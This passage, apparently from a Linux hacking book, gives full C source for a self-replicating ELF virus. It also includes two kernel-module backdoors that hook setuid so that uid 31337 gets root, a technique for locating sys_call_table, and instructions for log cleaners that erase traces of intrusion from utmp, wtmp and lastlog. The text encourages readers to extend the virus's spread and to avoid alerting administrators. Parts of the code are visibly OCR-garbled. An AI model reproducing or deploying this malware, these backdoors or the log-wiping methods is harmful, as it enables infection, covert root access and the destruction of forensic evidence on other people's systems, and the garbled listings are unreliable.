Many viruses have been created for UNIX-like systems in general and for Linux in particular, but none has become widespread. This is because access privileges in UNIX-like systems are strictly separated, and a virus must have root privileges to infect the entire system.

However, a serious local vulnerability discovered in a system would make it possible to infect the entire system even without root privileges. This can be achieved by combining a virus (an ELF infector) with an exploit that takes advantage of such a local vulnerability. Hoping that sooner or later a vulnerability affecting numerous Linux systems will be discovered, hackers are practicing by writing infectors. But even in this case, a serious epidemic would be almost impossible, because for a virus to spread it must be launched on numerous systems. This is not as easy as it used to be: the days when everyone exchanged diskettes are long gone. Today, UNIX system administrators mostly download their software from reliable Internet sources. Therefore, unless a popular Internet archive of executable programs is infected, the chances of a Linux virus becoming widespread are negligible. And if a virus is equipped with a mechanism for propagating itself over the Internet, it is no longer a virus but a worm (see Chapter 17).

Most infector viruses are written for executable ELF files, but because scripts (Perl, sh, etc.) are popular in UNIX systems, there are also viruses written in scripting languages that infect only scripts. Because this book is C-oriented, only ELF infectors written in C are considered, although nothing prevents you from writing an ELF infector in assembler.

Listing 16.1 later in this chapter shows the source code for the simplest and most universal ELF infector. You can also find it in the /PART IV/Chapter 16 directory on the accompanying CD-ROM. The infector doesn't do anything fancy; it simply seeks a victim (an ELF file) in the current directory and adds its body to the beginning of the victim's code. To avoid arousing the user's suspicions, when the infected file is launched, the infector temporarily separates its body from that of the victim, creates a temporary file, copies the victim's body into it, and executes that file. Then the infector deletes the temporary file, seeks another victim in the current directory, and writes its body at the beginning of the victim's body. This is how the virus replicates.

To avoid infecting an already infected victim, the infector tacks a mark, "Ivan 
Sklyaroff", at the end of each infected victim. Before infecting another prospective candi- 
date, the infector checks it for the mark. If the victim already has it, the infector leaves it alone 
and continues looking for another prey. 

In addition, the infector checks whether a prospective infection candidate is an executable ELF file. To this end, it looks for the 0x7f, 'E', 'L', 'F' signature at the beginning of the file and checks whether the file type field (e_type) in the victim's ELF header is set to the ET_EXEC constant, which means that the file is executable. Without these checks, the infector would add itself to scripts, text files, and all other types of files, thereby giving itself away.

The infector infects only one target in the current directory each time it is run. The number of victims per run can be increased by changing the value of the MAX_VICTIMS constant. You can also add the capability to spread the infection to all accessible directories.

The rest of the code ought to be clear from the comments. I recommend that you start 
studying the program from the main() function. 

The infector program is compiled as usual: 

# gcc elfinfector.c -o elfinfector

The size of the compiled infector can be reduced by processing it with the strip utility:

# strip elfinfector

An important detail: The VIRUS_LENGTH constant in the source code must be set to the exact size of the compiled program; otherwise, the infector will not work properly. You may have to compile the infector several times, using a different value each time, to find the right value. The value of 5,296 is the size of the compiled infector on my system (after being processed by the strip utility), but it can be different on your system.

In addition to the described infection method, more complex ones can be used. These include the following:

❑ By modifying the ELF file's headers, the virus can create one or more extra sections at the beginning, middle, or end of the victim file and place its body into such a section. In this case, the virus must change the program entry point (e_entry) to the beginning of "its" section. After the virus finishes its tasks, it passes control to the victim.

❑ The virus can place its body into the victim's data section (.data). (If there is not enough room in the section, the virus can increase its size.) The program entry point (e_entry) is then changed to point to the start of the virus's code in the data section. After the virus finishes its tasks, it passes control to the victim. Because the .data section usually has no execute permission, the virus must set this permission.

❑ Analogous to its actions in the data section, the virus can install itself into the code section (.text) or some other suitable section.


To give your brain a workout, try to implement one or even all of these methods. To be 
able to handle all of these tasks, I urge you to familiarize yourself with the following materials: 


1. “The ELF Virus Writing HOWTO” by Alexander Bartolich (http://vx.netlux.org/lib/vab00.html).
2. “UNIX Viruses” by Silvio Cesare (http://vx.netlux.org/lib/vsc02.html).





Listing 16.1. ELF infector (elfinfector.c) 





finclude <stdio.h> 
Finclude <stdlib.h> 
#include <sys/stat.h> 
finclude <fcntl.h> 
Finclude <dirent.h> 
#include <elf.h> 


fdefine VIRUS_LENGTH 5296 /* Correct length of the compiled infector */ 
fdefine TMP FILE "/tmp/body.tmp" 

#define MAX VICTIMS 1 /* Maximum number of infected files per launch */ 
fdefine INFECTED "Ivan Sklyaroff" /* Infected file mark */ 


char *body, *newbody, *virbody; 

int fd, lén, icount; 

struct stat status; 

Elf32 Ehdr ehdr; // For accessing the ELF header 


infect (char *victim) 

{ 
char belf(4)] = ('\x7E£', "E', 'L', 'E'}; 
char buf[64]; 


/* Reading the victim's ELF header */ 
fd = open(victim, O_RDWR, status.st_mode); 
read(fd, sehdr, sizeof(ehdr) ); 


/* Checking whether the prospective victim is an ELF file */ 
if {strnemp(ehdr.e ident, belf, 4) != 0) 
return; // Exiting the function if the victim is not an ELF file 
if (ehdr.e type != ET EXEC) 
return; // Exiting the function if the victim is not an executable file 


‘* Otherwise, reading the victim's body and saving it in a buffer */ 
fstat(fd, &status); 

lseek(fd, 0, SEEK_SET); 

newbody = malloc(status.st size); 

read(fd, newbody, status.st_ size); 


/* Checking for the infection mark at the end of the victim's hody */ 


i 
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lseek(fd, status.st_size - sizeof(INFECTED), SEEK SET); 
read(fd, &buf, sizeof (INFECTED) ); 


/* If there is a mark, the file is already infected; 
therefore, exit the function. */ 

if (strnemp(buf, INFECTED, sizeof(INFECTED)) == 0) 
return; 


/* Writing the virus body at the start of the file */ 
lseek(fd, 0, SEEK_SET); 

wWrite(fd, virbody, VIRUS_LENGTH); 

/* Writing the victim's body */ 

write (fd, newbody, status. st size); 

/* Adding an infection mark at the end of the victim's body */ 
write (fd, INFECTED, sizeof(INFECTED) }; 

close (fd); // Closing the infected file 


icount++; // Incrementing the infected file counter 


printf ("ts infected!\n", victim); 


find victim() 


{ 


} 


DIR *dir_ptr; 
struct dirent *d; 
char dir[100); 


getcwd(dir, 100); // Determining the current directory 
dir ptr = opendir(dir); // Opening the current directory 


/* Reading the directory while the elements (files) last */ 
while (d = readdir(dir ptr)) 
{ 
if (d->d ino != 0) { 
if (icount < MAX_VICTIMS) // Checking the infection counter 
infect (d->d_ name); // Calling the infection counter 


int main(int argc, char *argv[], char **envp) 


{ 


/* Opening the virus's file and determining the length */ 
fd = open(argqv[0]), O RDONLY); 

fstat(fd, a&status); 

lseek(fd, 0, 0); 


/* Reading the virus's body and saving it in a buffer */ 
virbody = malloc(VIRUS_LENGTH) ; 
read(fd, virbody, VIRUS_LENGTH); 


/* Checking the virus's length */ 
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if (status.st size != VIRUS LENGTH) { 


} 


/* An infected file is launched; therefore, 
separate the body of the program from the infector. */ 
len = status.st_size - VIRUS_LENGTH; 
lseek(fd, VIRUS LENGTH, 0); 
body = malloc (len); 
read(fd, body, len); 
close (fd); 


/* Saving the original program in a temporary file */ 

fd = open(TMP_FILE, O_RDWR|O CREAT|O TRUNC, status.st_mode) ; 
write(fd, body, len); 

close (fd); 

/* Launching the original program */ 

if (fork() == 0) wait(); 

else execve (TMP FILE, argv, envp); 

/* Deleting the temporary file */ 

unlink (TMP_FILE); 


/* Looking for a victim and infecting it */ 
Find victim(); 


/* Exiting the infector */ 
close (fd); 
exit (0); 


Chapter 17: Worms 





Like viruses, worms are computer programs that propagate themselves over a network. 
The main difference between worms and viruses is that the former are self-sufficient pro- 
grams; that is, worms don’t have to attach themselves to an executable file to replicate. 

I intended to write a practice worm for this chapter and use it to examine all the details of programming a worm, but for several reasons I changed my mind. This should not upset you too much (you are not going to write real Internet worms, are you?). A worm is simply a combination of network, exploit, and in some cases virus technologies, all of which are considered in detail in this book. Therefore, I believe it is enough to describe how these technologies interact in a worm and to give general worm construction principles. You can also find the complete source code of the classic Morris worm (now harmless) in the /PART IV/Chapter 17 directory on the accompanying CD-ROM. This was the first computer worm to become known all over the world. It was created by Robert Morris Jr., a student at Cornell University. The worm started spreading on November 2, 1988, striking thousands of computers connected to the ARPANET network, including computers at scientific research facilities, universities, military agencies, and even the Pentagon. The Morris worm could only infect UNIX systems. The damage it caused was estimated at $100 million.

Not counting their numerous modifications, only a few UNIX worms have existed. In the chronological order of their appearance after the Morris worm, these are Ramen, Lion, Cheese, Sadmind, Adore, Slapper, and Lupper.




You can find detailed information on each of these worms on the websites of antivirus software developers.
A standard worm has three parts: 


❑ The head, which is also sometimes called the enabling exploit code
❑ The body
❑ The payload


Alternatively, a worm can have only the body. 

The payload is intended for inflicting some damage — for example, deleting some files or 
organizing a DoS attack from the infected machine against some host — or simply for install- 
ing a backdoor to control the infected computer remotely. The Morris worm had no payload; 
that is, it did not have any built-in destructive functions. 

The worm head is usually an exploit that takes advantage of a software bug (buffer overflow, format string error, etc.) to take over a remote machine. It then establishes a TCP/IP connection and loads the body of the worm and the payload (if the worm has one) from the network. Some worms can load themselves entirely onto the remote machine right away; that is, their head, body, and payload are a single piece of code. Naturally, such worms are much easier to implement. The reason for a separate head is that the overflowing buffer is often just a few dozen bytes long, which is only enough to hold a small loader. Worms often have more than one head. For example, the Ramen worm had three heads. If Ramen determined that the victim's computer ran Red Hat 6.2, one of its heads exploited the wu-ftpd daemon and another exploited the rpc.statd daemon. If the computer ran Red Hat 7.0, only the third head was used, which exploited the LPRng daemon. The Morris worm had two true heads, which exploited the fingerd daemon and the sendmail daemon. In addition, it had a third head, which was not actually an exploit but a tool to crack passwords and connect to the rsh/rexec services.

Once the worm body is loaded, it takes charge of propagating the worm from the infected 
system and launches the payload. A worm can also install itself in the startup section, although 
it may not do this. 

To continue propagating, the worm must determine the IP addresses of hosts suitable for 
infection. It accomplishes this task in several ways: by scanning IP addresses of the current 
subnet, generating random IP addresses, searching the victim’s local files for network ad- 
dresses, and importing data from the victim’s mail log. In addition to IP addresses, a worm 
can look for URLs and email addresses. 

The worm then must test whether the obtained addresses are valid and, if so, whether 
the given remote host runs under a vulnerable version of the operating system or runs 
a vulnerable service that can be infected using one or more of the worm’s heads. This task is 
accomplished by simply sending a request to the host and examining the reply. The request 
type depends on the specific service or operating system; for a Web server, this can be simply a 
GET request. 
Next, the worm must check whether the given host is already infected with a copy of the worm. This is often done by checking for a certain word or character combination: the worm sends a keyword in a network request and, if the host is already infected, the copy of the worm on the infected machine sends another keyword in reply. This is where Robert Morris blundered. Quite logically, he foresaw that it would be too easy to defend against his worm by simply running a process that answered “yes” when asked whether a copy was already running on the prospective infection candidate, making the host appear to be already infected. Therefore, he equipped his worm with a mechanism to ignore every seventh positive reply and proceed with infection anyway. But this ratio proved far too high. Already infected systems were reinfected repeatedly, and each new copy consumed a portion of the computer's and the network's resources until nothing was left for normal operation.

After a victim is selected, the worm head (or heads) exploits a bug in its software and the 
infection continues according to the described scheme. 


PART V: 
LOCAL HACKING TOOLS 











Chapter 18: Introduction to 
Kernel Module Programming 





Many types of Linux hacker utilities use the loadable kernel module (LKM) technology. A module is a chunk of code that the kernel can load and unload as necessary. Loading a module expands the kernel's functionality without requiring the operating system to be restarted. Because a module is part of the kernel, using modules makes it possible to expand system capabilities practically without limit. Even though log cleaners (considered in Chapter 19) do not use the LKM technology, keyloggers and rootkits (considered in Chapters 20 and 21) do. Therefore, in this chapter I present the fundamentals of kernel module programming. Programming modules for the version 2.4.x kernel is different from programming modules for the version 2.6.x kernel. Later in the book, only the 2.6.x kernel will be considered. However, this chapter also covers programming LKMs for the 2.4.x kernel, because this kernel version is still used on some servers; moreover, this will help you better understand the changes that took place in the 2.6.x kernel. You can obtain more detailed information on kernel module programming from other literature, such as The Linux Kernel Module Programming Guide (http://tldp.org/guides.html). This guide has been continually updated since the 2.2.x kernel.


18.1. Version 2.4.x Modules 


In Chapter 11, a local backdoor was considered, which was an LKM for the 2.4.x Linux kernel. I will use this backdoor (Listing 11.1) as an example to examine the construction of modules for the 2.4.x kernel. A standard kernel module consists of two functions. The first function, init_module(), is called right after the module is installed into the kernel. The second function, cleanup_module(), is called right before the module is removed from the kernel. It usually restores the environment that existed before the module was installed; that is, it undoes whatever the init_module() function did. The example module (Listing 11.1) intercepts the setuid system call and replaces it with its own version. This system call is made whenever a user logs into the system, when a new user is registered, and the like. The names and numbers of Linux system calls are stored in the /usr/include/asm/unistd.h header file. Note that there are two calls for setuid in this file:


#define __NR_setuid 23

#define __NR_setuid32 213

On my system, the second version (__NR_setuid32) works; it is possible that the first version will work on yours.

The kernel has a system call table, named sys_call_table, which maps each system call number to the address of the kernel function that implements it. Thus, the function address for __NR_setuid32 is simply replaced with a pointer to the new function (I called it change_setuid), which performs the necessary operations. The new function checks the uid with which the system call was made. If it is 31337, the function sets root (0) privileges for the current process (current).

Compiling the Listing 11.1 backdoor shows how 2.4.x kernel modules are compiled: 

# gcc -o bdmod.o -c bdmod.c 


The resulting object file, bdmod.o, must be copied to the directory in which the insmod utility searches for modules. Usually, this is the /lib/modules directory:

# cp bdmod.o /lib/modules

Then the module is loaded as follows:

# insmod bdmod.o

The lsmod utility is used to verify that the module has been installed. The utility displays information about loaded modules, which it obtains from the /proc/modules file. The following is an example of this utility executing on my system:

# lsmod

Module                  Size  Used by
bdmod                    656   0  (unused)
autofs                 11264   1  (autoclean)
tulip                  38544   1  (autoclean)
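The lsmod utility does little more than format the contents of /proc/modules. As a rough illustration, the following C code reads that file and prints the first three fields of each line. It is a sketch, not the real lsmod source. The helper names parse_module_line() and list_modules() are hypothetical. The code assumes only that each line begins with the module name, its size, and its use count, which holds for both the 2.4.x format shown above and the 2.6.x format. Any dependency or state columns are ignored.

```c
#include <stdio.h>

/* Hypothetical helper: parse the first three whitespace-separated fields
   of one /proc/modules line (module name, size in bytes, use count).
   Returns 1 on success, 0 if the line does not match. */
static int parse_module_line(const char *line, char name[64],
                             unsigned long *size, int *used)
{
    return sscanf(line, "%63s %lu %d", name, size, used) == 3;
}

/* Print a minimal lsmod-style listing. Returns the number of modules
   listed, or -1 if /proc/modules cannot be opened. */
static int list_modules(void)
{
    FILE *f = fopen("/proc/modules", "r");
    if (f == NULL)
        return -1;

    char line[4096], name[64];
    unsigned long size;
    int used, count = 0;

    printf("%-20s %8s %s\n", "Module", "Size", "Used by");
    while (fgets(line, sizeof line, f) != NULL) {
        if (parse_module_line(line, name, &size, &used)) {
            printf("%-20s %8lu %d\n", name, size, used);
            count++;
        }
    }
    fclose(f);
    return count;
}
```

Calling list_modules() from main() prints a table similar to the one above. It returns the number of modules listed, or -1 if /proc/modules cannot be opened.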


Now you can check the module's operation by logging into the system with uid = 31337. As a result, the user is granted root privileges, as shown by running the id command:

# id

uid=0(root) gid=0(root)

The module can be removed from the kernel with the rmmod command:

# rmmod bdmod
18.2. Version 2.6.x Modules


In addition to the regular module structure, which is used in the 2.4.x kernel, a capability to 
use a new module structure was introduced in the 2.6.x kernel: 

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>

MODULE_LICENSE("GPL");

static int __init my_init(void)
{
	return 0;
}

static void __exit my_cleanup(void)
{
}

module_init(my_init);
module_exit(my_cleanup);

Thus, the module_init() and module_exit() macros (defined in the linux/init.h header file) free you from naming the module's initialization and cleanup functions init_module() and cleanup_module(); any names can be used. Even though the new module structure is convenient, I continue using only the regular module structure, which is used in the 2.4.x kernel.

The most important change in the 2.6.x kernel is that the sys_call_table system call table is no longer exported; thus, the code in Listing 11.1 will not work in the 2.6.x kernel. Hackers, however, have found ways of obtaining the address of sys_call_table, two of which I consider here. As an example, the local backdoor code shown in Listing 11.1 is modified to work on the 2.6.x kernel.


18.2.1. Determining the Address of sys_call_table: Method One 


The address of the system calls table can be found in the System.map file, in which the kernel 
variables and functions are described: 

# grep sys_call_table /boot/System.map

c03ce760 D sys_call_table

Now the following assignment can be made in the module: 

unsigned long “sys call table; 

*(long *)ésys_call_ table=0xcO03ce760; 

Afterward, system calls can be replaced using the xchg() function. Listing 18.1 shows the source code for a local backdoor for the 2.6.x kernel that uses the first method of determining the address of sys_call_table. I advise you to include the MODULE_LICENSE("GPL") macro, which specifies the licensing terms, in all hacker modules. A module will load without this definition, but the kernel will issue a corresponding warning. That warning is entered in the logs and may attract unwanted attention from the administrator.
Modules for the 2.6.x kernel are compiled differently from those for the 2.4.x kernel. First, a makefile needs to be created with the following contents (specific to the bdmod-2.c module):

obj-m += bdmod-2.o

Then, a command to make the module is executed:

# make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules


If your /usr/src directory has the symbolic link linux to the directory containing the kernel sources, the make command will look as follows:
# make -C /usr/src/linux SUBDIRS=$PWD modules


Naturally, the kernel sources must be installed on your system in the /usr/src directory. If you don't have the kernel sources where they are supposed to be, you should install them; otherwise, the module build will fail. The graphical package tools in KDE or GNOME are convenient for installing packages; look for an item like Program Setup in the menu. The needed kernel source package is usually named kernel-source-<version number>.

Executing the command creates an object file of the module, bdmod-2.ko, in the current 
directory. Note that the extension for 2.6.x kernel module object files is .ko, not .o. 

Now the module can be loaded: 

# insmod bdmod-2.ko 

A list of the installed modules can be displayed using the lsmod command; a module can be removed using the rmmod command:

# rmmod bdmod-2

The source code for the bdmod-2.c module can be found in the /PART V/Chapter 18 directory on the accompanying CD-ROM.





Listing 18.1. A local LKM backdoor for the 2.6.x kernel (bdmod-2.c) 





/* Module backdoor for Linux 2.6.x */ 
#include <lLinux/module.h> 

#include <linux/kernel.h> 

#include <Linux/init.h> 

#include <linux/syscalls.h> 

#include <Linux/unistd.h> 


MODULE LICENSE ("GPL"); 


unsigned long *“sys_call table; 
int (*orig setuid) (uid _t); 


int change setuid(uid t wid) 
{ 
if (uid == 31337) 
( 
current->uid = 0; 
current->euid = 0; 
current->gid = 0; 
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current->egid = 0; 
return 0; 
} 
return (*orlg setuid) (uid); 
} 


int init module (void) 
{ 
*({long *)ésys call table = OxcO3ce760; 
orig setuid = {void *)xchq(é&sys_call_table[ 


= __ NR setuid32], change setuid); 
return 0; 
} 
void cleanup module (void) 
xchg(&sys call table{ NR setuid3Z)], orig setuid); 





18.2.2. Determining the Address of sys_call_table: Method Two 


A major drawback of the first method of finding the address of the system call table is that it has to be done manually and that the address changes from one system to another. Thus, an automatic way of finding the address of sys_call_table is needed. You could simply insert into a module a function that opens the System.map file and looks for the address of sys_call_table in it. But I want to show you another method, to demonstrate what a keen hacker mind is capable of. I learned this method from the “Protection against Stack Execution (OS Linux)” article by the hacker dev0id of the UkR Security Team (http://www.ustsecurity.info).

Dev0id discovered that the address of the sys_call_table table always lies between the end of the code section and the end of the data section of the current process. He also discovered that the sys_close call is exported by the kernel. Because the system call table contains the addresses of all system calls ordered by their numbers, dev0id arrived at an idea. The address of sys_close could be found by going through all addresses between the end of the code section and the end of the data section. The address of sys_call_table is then obtained by subtracting the call number from the location where the sys_close address was found. The call number of sys_close is 6. The numbers of the other system calls can be found in the /usr/include/asm/unistd.h header file.

To obtain the address of the end of the code section (init_mm.end_code) and of the end of the data section (init_mm.end_data), dev0id used the init_mm variable. This variable is an mm_struct structure (defined in the arch/i386/kernel/init_task.c kernel source file). Its main task is to describe memory management for the kernel's initial task (not to be confused with the init process, which has PID 1).


Unfortunately, the article is written in Russian and, as far as I know, no English translation of it is available yet.
Listing 18.2 shows the source code for a function that locates the address of the system call table. This function will be used in all future 2.6.x kernel modules requiring call substitution. For the function to work, a global variable must also be defined:


unsigned long* sys. call table; 


Listing 18.3 shows the source code for a local backdoor that uses the second method of determining the sys_call_table address. The module is built and installed into the kernel in the same way as in the previous section.

The source code for the bdmod-3.c module can be found in the /PART V/Chapter 18 directory on the accompanying CD-ROM.

The “Linux On-the-Fly Kernel Patching without LKM” article in issue #58 of the electronic magazine Phrack offers another way of determining the address of sys_call_table. This method, however, depends on the current platform, and its algorithm is complex.





Listing 18.2. Function for determining the sys_call_table address 





void find sys call table({void) 
{ 
int ij 
unsigned long *ptr; 
unsigned long arr[4]; 
/* Obtaining a pointer to the end of the code section */ 
ptr = (unsigned long *) ((init mm.end code + 4) & Oxfffffffc); 
/* Searching until the end of the data section */ 
while({(unsigned long)ptr < (unsigned long)init_mm.end data) { 
/* Finding the address of sys close */ 
if (*ptr == {unsigned long) ((unsigned long *)sys close)) { 
for(i = O; 1 < 4; it+) { 
arr[i] =* (ptr + i}; 
arrc[i]) = tarr[i] >> 16) & OxOO00ff£f; 
} 
/* Is the address really in the table? */ 
if(arr[O) != arr{2] || arr[1] != arr[(3]}) { 
/* Determining the address of the system calls table */ 
sys_call table = (ptr - NR close); 
break; 
} 
ptr++; 


} 


Listing 18.3. Local LKM backdoor for the 2.6.x kernel (bdmod-3.c)








/* Module backdoor for Linux 2.6.x */ 
finclude <linux/module.h> 
finclude <linux/kernel.h> 
finclude <Linux/unistd.h> 
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#include <linux/syscalls.h> 
MODULE LICENSE ("GPL"); 


unsigned long* sys call table; 
int (*orig setuid) (uid t); 


void find sys call table (void) 
{ 
int i; 
unsigned long *ptr; 
unsigned long arr[4]; 


ptr = (unsigned long *) ((init_mm.end_ code + 4) & Oxfffrttfic); 
while((unsigned long)ptr < (unsigned long)init mm.end data) { 
if ("ptr == (unsigned long) {((unsigned long *)sys _ close}) { 


for(i = 0; i < 4; i++) { 
arr[i] = *{ptr + i}; 


arr[i] = larr[i] >> 16) & OxQO00ffff; 
} 
if(tarr([0] != arr({2] || arr[1]) != arr[3]) { 
sys call table = (ptr - _NR.close); 
break; 
} 
} 
ptrtt+; 


} 


int change setuid(uid t uid) 
{ 
if (uid = 31337) 
1 
current->uid = 0; 
current->euid = 0; 
current->gid = 0; 
current->egid = 0; 
return 0; 
} 
return (*orig setuid) (uid); 


} 


int init module (void) 
i 
Find sys call table(); 
orig setuid = (void *)sys_call_table[_ NR_setuid32); 
sys call table[ NR _setuid32] = (unsigned long)change setuid: 
return 0; 
} 


void cleanup module (void) 
( 

sys_call table[_ NR_setuid32] = (unsigned long)orig_ setuid; 
} 
Chapter 19: Log Cleaners





Log cleaners (also called log wipers) are used for removing (cleaning) information from system log files. Hackers clean log files to conceal the fact that they have broken into the system and have access to it. Sometimes log cleaners come as a rootkit component (see Chapter 21). Most Linux log files are stored in the /var/log directory.

It might look much easier to simply remove all the log files in a compromised system; however, only the most inexperienced crackers do this, because the administrator will then promptly learn of the break-in. Log cleaners remove only the information in the log files that concerns the hacker's actions. This avoids raising the administrator's suspicions and allows the perpetrator to remain invisible in the system.

There are two types of log files: text and binary. Text log files store information in text format; the messages, secure, xferlog, and maillog files are a few examples. Binary log files store information in binary format; the utmp, wtmp, and lastlog files are a few examples.

Log cleaners clean logs using one of the following three methods: 


- Log entries that are to be removed are located and overwritten with spaces or zeros using functions like memset() or bzero().

- All contents of a log file except the information that needs to be concealed are copied to a temporary file or a temporary memory buffer and then copied back into the log file, overwriting the old contents.

- Instead of being deleted, the information is replaced with fake data. For example, the hacker's IP address can be replaced with someone else's, either to throw the investigation off the trail or to set that person up.


Many available log cleaner utilities modify logs in one way or another. The best known of them are marry, logcloak, cloack2, remove, zap2, vanish, and wipe. Their source codes can be found at http://packetstormsecurity.org.

I will show you how to write log cleaners that work based on the first and second methods. 
The knowledge obtained in the process will be sufficient to allow you to write a log cleaner 
based on the third method by yourself. 


19.1. Structure of Binary Log Files 


Whereas text logs can be handled just like regular text files, binary logs are another story be- 
cause of their special structure. The following is a list of the main Linux log files: 


- utmp: stores information about the current connections to the system. Its standard location is the /var/run directory. The information from this log is used by the who and w system utilities.

- wtmp: stores the history of connections to the system. Its standard location is the /var/log directory. The information from this log is used by the last system utility.

- lastlog: records the most recent login of each user. Its standard location is the /var/log directory. The information from this log is used by the lastlog system utility.


Removing the utmp, wtmp and lastlog files disables log keeping. To enable log keeping, 
blank copies of these files must be created: 

# cp /dev/null /var/run/utmp

# cp /dev/null /var/log/wtmp

# cp /dev/null /var/log/lastlog

In addition to learning how to clean these files, cleaning the btmp log file, which stores 
information about unsuccessful login attempts, will also be considered. Its standard location 
is in the /var/log folder. The information from this log is used by the lastb command, which 
is similar to the last command. By default, there is no btmp file in the system, so to enable 
this particular logging it must be created: 

# cp /dev/null /var/log/btmp 


I have never seen a log cleaner that cleans this log file, so the demonstration utilities will remedy this deficiency.

All of the mentioned binary logs store information about logins to the system and system reboots; therefore, processes like login, getty, ftp, xdm, kdm, and the like must be able to write to these logs.

If the hackers do not clean up the logs, the administrator can easily detect their presence in the system by simply running such utilities as who, w, last, lastlog, and lastb. Actually, there are numerous ways other than cleaning the system logs for covering up one's tracks in the system. You can, for example, sneak in a kernel module to intercept system calls. You can also replace the executable files of the who, w, and other administrative utilities with modified versions that show only part of the information they are supposed to show. Those methods, however, fall beyond the scope of this chapter, and I will only consider log cleaning utilities here.

The who, w, and last utilities use only part of the much larger body of data stored in the utmp and wtmp log files. The complete information from these files, and also from the btmp file, can be viewed in human-readable format with the help of the utmpdump utility:

# utmpdump /var/run/utmp 

# utmpdump /var/log/wtmp 

# utmpdump /var/log/btmp 

The utility outputs information in lines, each composed of eight fields enclosed in square brackets. The following is a sample output line:

[7] [11422] [ts/3] [root    ] [pts/3       ] [                    ] [0.0.0.0        ] [Tue Jul 04 05:21:46 2006 ]

The first field holds the record type (ut_type; 7 stands for USER_PROCESS), and the second holds the process ID (PID). The third field, the terminal identifier, can hold the following values: ~~, bw, a digit, or a character and a digit. They mean, respectively, a runlevel change or a system reboot, a bootwait process, a TTY number, and a letter/digit combination for a pseudo-terminal (PTY). The fourth field can be either empty or hold the user name, reboot, or runlevel. The fifth field holds the TTY or PTY device, if this information is available. The sixth field holds the name of the remote host; if the login is performed from the local host, this field is blank. The seventh field holds the IP address of the remote host, and the eighth holds the date and time the record was made. The utmp and wtmp files have the same format but are used differently: wtmp is an append-only history in which new records are added at the end of the file (last displays them in reverse order, newest first), whereas utmp holds one slot per terminal line and reuses slots as sessions come and go. The utmp file often contains stale records left by improperly terminated sessions.
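To see how the bracketed fields map onto the members of struct utmp (Listing 19.1), here is a minimal sketch of a function that prints one record in a similar layout. It is not utmpdump's actual source: format_utmp_record() is a hypothetical name, the fields are not padded, and the time is printed as raw seconds since the epoch rather than as a date string. It assumes glibc's <utmp.h>.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <utmp.h>

/* Format one utmp record as "[type] [pid] [id] [user] [line] [host] [addr] [time]".
   Simplifications (assumptions): no column padding, time shown as epoch seconds. */
int format_utmp_record(const struct utmp *u, char *out, size_t outlen)
{
    char addr[INET6_ADDRSTRLEN];

    /* The address is stored in network byte order. If only the first
       32-bit word is used, treat it as IPv4; otherwise as IPv6. */
    if (u->ut_addr_v6[1] || u->ut_addr_v6[2] || u->ut_addr_v6[3])
        inet_ntop(AF_INET6, u->ut_addr_v6, addr, sizeof addr);
    else
        inet_ntop(AF_INET, &u->ut_addr_v6[0], addr, sizeof addr);

    /* The character fields need not be NUL-terminated, so every %s
       conversion is bounded by the size of its field. */
    return snprintf(out, outlen, "[%d] [%d] [%.*s] [%.*s] [%.*s] [%.*s] [%s] [%ld]",
                    u->ut_type, (int)u->ut_pid,
                    (int)sizeof u->ut_id, u->ut_id,
                    (int)sizeof u->ut_user, u->ut_user,
                    (int)sizeof u->ut_line, u->ut_line,
                    (int)sizeof u->ut_host, u->ut_host,
                    addr, (long)u->ut_tv.tv_sec);
}
```

For a local root login on pts/3 with a zeroed address and time, the function produces "[7] [11422] [ts/3] [root] [pts/3] [] [0.0.0.0] [0]".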

Consulting man utmp or man wtmp, you can find out that the utmp and wtmp log files consist of a series of structures. These structures are identical for the wtmp, utmp, and btmp files and are declared in the utmp.h header file (Listing 19.1), which is located in the /usr/include/bits directory.


Listing 19.1. The structure of the utmp file 
#define UT_LINESIZE 32
#define UT_NAMESIZE 32
#define UT_HOSTSIZE 256

struct exit_status
{
    short int e_termination;    /* The process termination status code */
    short int e_exit;           /* The process exit status code */
};

struct utmp
{
    short int ut_type;              /* Type of login */
    pid_t ut_pid;                   /* Process ID of login process */
    char ut_line[UT_LINESIZE];      /* Device name (console, ttyxx) */
    char ut_id[4];                  /* The identifier from the /etc/inittab file (usually, the line number) */
    char ut_user[UT_NAMESIZE];      /* User name */
    char ut_host[UT_HOSTSIZE];      /* The name or IP address of the remote host */
    struct exit_status ut_exit;     /* The exit status of a process marked as DEAD_PROCESS */
    long int ut_session;            /* The session ID */
    struct timeval ut_tv;           /* The time the record was made */
    int32_t ut_addr_v6[4];          /* The IP address of the remote host in network byte order
                                       (for a local user this field is zero) */
    char __unused[20];              /* Reserved for future use */
};

/* For backward compatibility */
#define ut_name ut_user
#ifndef _NO_UT_TIME
#define ut_time ut_tv.tv_sec
#endif
#define ut_xtime ut_tv.tv_sec
#define ut_addr ut_addr_v6[0]





The lastlog structure is also defined in the utmp.h header file (Listing 19.2). 





Listing 19.2. The lastlog structure 





struct lastlog
{
    __time_t ll_time;               /* A time stamp */
    char ll_line[UT_LINESIZE];      /* A device name (console, ttyxx) */
    char ll_host[UT_HOSTSIZE];      /* The IP address or the name of the remote host (blank for
                                       a local user) */
};











There is a separate lastlog.h header file, but it usually contains only one line: #include 
<utmp.h>; that is, all information is in the utmp.h file. 
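Because every record has the same size, the number of records in a utmp, wtmp, or btmp file can be derived from the file size alone. A minimal sketch, assuming glibc's <utmp.h>; the function name utmp_record_count() is hypothetical:

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <utmp.h>

/* Return the number of struct utmp records in a utmp/wtmp/btmp file,
   or -1 if the file cannot be examined or its size is not an exact
   multiple of sizeof(struct utmp). */
long utmp_record_count(const char *path)
{
    struct stat st;

    if (stat(path, &st) == -1) {
        perror(path);
        return -1;
    }
    /* A fixed-size record format means the size must divide evenly. */
    if (st.st_size % (off_t)sizeof(struct utmp) != 0)
        return -1;
    return (long)(st.st_size / (off_t)sizeof(struct utmp));
}
```

A size that is not a multiple of sizeof(struct utmp) suggests the file is truncated or was not written in this format.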

As a rule, entries in the utmp, wtmp, and lastlog files are maintained by the program that made them, and entries are not actually deleted. In the utmp file, the user login and host fields of the corresponding structure are cleared, the value in the time field (ut_time) is changed to the logout time, and the entry type (ut_type) is changed from USER_PROCESS to DEAD_PROCESS; in the wtmp file, a separate logout record is appended. The following are the definitions for ut_type taken from the utmp.h header file:

#define EMPTY          0   /* No valid user accounting information */
#define RUN_LVL        1   /* The system's runlevel */
